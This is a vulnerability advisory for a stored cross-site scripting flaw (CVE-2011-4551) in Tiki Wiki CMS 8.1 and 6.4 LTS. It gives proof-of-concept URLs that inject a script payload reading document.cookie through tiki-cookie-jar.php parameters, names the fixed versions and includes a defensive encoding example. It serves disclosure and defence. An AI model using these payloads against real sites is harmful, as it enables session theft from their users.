
INFOSERVE-ADV2011-07 - Tiki Wiki CMS Groupware stored Cross-Site-Scripting

Advisory: Tiki Wiki CMS Groupware Stored Cross-Site-Scripting
Advisory ID: INFOSERVE-ADV2011-07
Author: Stefan Schurtz
Contact:
Affected Software: Successfully tested on Tiki 8.1 & 6.4 LTS (affects all current releases)
Vendor URL:
Vendor Status: fixed
CVE-ID: CVE-2011-4551
 
======================
Vulnerability Description
======================

All current releases of Tiki Wiki are prone to a stored XSS vulnerability.
 
==============
PoC-Exploit
==============

Tested with Firefox 7.01

"Visit" this URL
 
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site
 
But when you visit one of these pages, the XSS is executed:

http://<target>/tiki-8.1/tiki-login.php
http://<target>/tiki-8.1/tiki-remind_password.php

// browser source code

    show_errors: 'y',
    xss: '</style></script><script>alert(document.cookie)</script>'
};

Another example:

http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>

All of them will be executed!

// browser source code

    show_errors: 'y',
    xss1: '</style></script><script>alert(document.cookie)</script>',
    xss2: '</style></script><script>alert(document.cookie)</script>',
    xss3: '</style></script><script>alert(document.cookie)</script>'
};

=====
Solution
=====

Upgrade to Tiki 8.2 or 6.5 LTS
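
The source fragments in the PoC show stored request values written verbatim into a quoted object literal inside an inline script, so a value containing </script> ends the script element. The following is an added example (not Tiki's code and not the vendor's patch) that contrasts that output pattern with context-aware encoding; the variable name `prefs` and all function names are hypothetical, since the advisory shows only the object body.

```javascript
// Added example. Constructed input: parameter names and value taken from the advisory's PoC.
const stored = {
  show_errors: "y",
  xss: "</style></script><script>alert(document.cookie)</script>",
};

// Pattern seen in the advisory's "browser source code": each value is wrapped
// in quotes and written into the inline script without any encoding.
// `prefs` is a hypothetical name; the page does not show the real one.
function renderUnsafe(params) {
  const body = Object.entries(params)
    .map(([key, value]) => `    ${key}: '${value}'`)
    .join(",\n");
  return `<script>\nvar prefs = {\n${body}\n};\n</script>`;
}

// Characters that matter to the HTML parser (or to older JS parsers) are
// replaced with \uXXXX escapes, which are still valid inside a JSON/JS string.
const JS_ESCAPES = {
  "<": "\\u003C", ">": "\\u003E", "&": "\\u0026",
  "\u2028": "\\u2028", "\u2029": "\\u2029",
};

// Hardened pattern: JSON-encode keys and values, then escape for the
// inline-script context so no markup can appear inside the literal.
function toInlineScriptLiteral(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) => JS_ESCAPES[c]);
}

function renderSafe(params) {
  return `<script>\nvar prefs = ${toInlineScriptLiteral(params)};\n</script>`;
}

// The HTML tokenizer ignores JS quoting: the first "</script" closes the
// element and any later "<script" opens a new one. Count the elements opened.
function countScriptElements(html) {
  return (html.match(/<script\b/gi) || []).length;
}

console.log("unsafe:", countScriptElements(renderUnsafe(stored)), "script elements");
console.log("safe:  ", countScriptElements(renderSafe(stored)), "script element");
```

The encoded literal still parses back to the original string, so legitimate values survive unchanged while the page keeps a single script element.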

================
Disclosure Timeline
================

16-Nov-2011 – informed Security Team (security@tikiwiki.org)
19-Dec-2011 – fixed by vendor

====
Credits
====

Vulnerability found and advisory written by the INFOSERVE security team.

=======
References
=======

http://info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Security-Patches-Available
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt
